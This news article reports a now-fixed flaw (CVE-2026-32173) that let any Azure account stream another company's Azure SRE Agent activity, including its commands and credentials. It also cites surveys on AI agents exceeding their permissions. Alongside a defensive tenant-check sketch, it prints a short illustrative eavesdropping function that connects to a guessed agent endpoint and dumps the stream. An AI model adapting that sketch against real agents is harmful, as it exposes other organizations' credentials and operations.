Outsiders Could Exploit Misconfig to Stream Commands, Credentials
Any outsider with a free Microsoft cloud account and a short script could watch another company’s artificial intelligence operations agent in real time – reading its commands, its reasoning and its passwords – without the company ever knowing.
Microsoft’s Azure SRE Agent, an automated cloud operations service, connects to a company’s Azure environment and acts as a round-the-clock operations partner. It watches for alerts, diagnoses outages and executes fixes on behalf of IT teams by restarting services, scaling resources, rolling back software deployments and running command-line instructions across a company’s cloud infrastructure. It has access to source code, logs, system metrics and integrations with incident management platforms such as PagerDuty and ServiceNow. Microsoft’s own Azure App Service team cut its average incident resolution time from 40 hours to three minutes using it.
The agent streams all its activity in real time through a communication channel. Connecting to it requires a digital token. Researchers at Enclave found that the system issuing the tokens was configured to serve users across all Microsoft cloud tenants. Any Azure account from any company worldwide could obtain a valid token from Microsoft’s own authentication infrastructure. The channel then checked whether the token was legitimate, but did not verify whether the account holding it belonged to the company it was attempting to observe. All activity was broadcast to all connected parties with no filtering by identity.
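The gap described above is the difference between authentication and authorization: the channel confirmed the token was genuine but never asked whether the token's tenant matched the tenant that owned the agent. A minimal sketch of that missing check, using hypothetical names (`EXPECTED_TENANT`, the `tid` claim convention from Microsoft Entra ID tokens) and skipping signature verification for brevity:

```python
import base64
import json

# Hypothetical tenant ID of the company that owns the agent.
EXPECTED_TENANT = "contoso-tenant-guid"

def decode_claims(token: str) -> dict:
    """Decode a JWT payload without verifying its signature (illustration only)."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))

def authorize(token: str) -> bool:
    claims = decode_claims(token)
    # The vulnerable setup stopped at "is this a valid Microsoft-issued token?"
    # -- a check any free Azure account in any tenant could pass.
    # The missing step: does the token's tenant match the resource's tenant?
    return claims.get("tid") == EXPECTED_TENANT
```

In the reported misconfiguration, the equivalent of this tenant comparison was absent, so any validly issued token from any tenant was granted the stream.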
The scope of exposure included every message a user sent to the agent and its response. Also included was the agent’s step-by-step reasoning about a company’s infrastructure before it took action – along with every command it ran, including the full details of those commands, and every command’s output, including credentials. In the researchers’ test environment, a routine task returned deployment credentials for live web applications in plain text, flowing straight through the open connection.
What made the flaw hard to catch was the absence of records on the victim’s side: the only log of the connection existed on the attacker’s own machine. Organizations whose agents were accessed had no way to detect the intrusion at the time, investigate it afterward or determine what an outsider saw.
The attack required minimal resources: one free Azure account, the target agent’s web address – which usually follows a predictable format – and about 15 lines of code. Every deployed instance of Azure SRE Agent was potentially reachable this way.
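To give a sense of how little code "about 15 lines" is, here is an illustrative sketch of the pattern. The endpoint format, the `example-sre-agent.azure.com` host and the query-string token passing are all assumptions: neither the real URL scheme nor the channel's transport was disclosed, and the listener assumes the third-party `websockets` package.

```python
import asyncio

def agent_stream_url(target: str, token: str) -> str:
    # Hypothetical "predictable format" for an agent's streaming endpoint.
    return f"wss://{target}.example-sre-agent.azure.com/stream?access_token={token}"

async def eavesdrop(target: str, token: str) -> None:
    # Assumed transport: a WebSocket via the third-party `websockets` package.
    import websockets
    async with websockets.connect(agent_stream_url(target, token)) as ws:
        async for message in ws:
            # Every prompt, reasoning step, command and command output the
            # agent streamed would arrive here, unfiltered by identity.
            print(message)
```

The point of the sketch is proportion, not procedure: obtain a token, open one connection to a guessable address, and read whatever is broadcast.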
Enclave reported the flaw to Microsoft’s Security Response Center, which confirmed it, rated it critical and fixed it on the server side, applying the fix directly to its own infrastructure. The flaw is tracked as CVE-2026-32173 and carries a CVSS score of 8.6. Microsoft’s advisory classifies it as improper authentication, meaning the system failed to adequately verify who was connecting before granting access.
The case comes at a moment when the security industry is raising concerns about AI agents. A study by the Cloud Security Alliance found that 53% of organizations have had AI agents exceed intended permissions. The organization’s research, commissioned by security firm Zenity, found that rapid AI adoption routinely outpaces governance controls.
A report from API platform company Gravitee, which surveyed over 900 executives and technical practitioners, found that while more than 80% of technical teams have moved past planning into active testing or production deployment of AI agents, only 14.4% sent those agents into production with full security and IT approval.
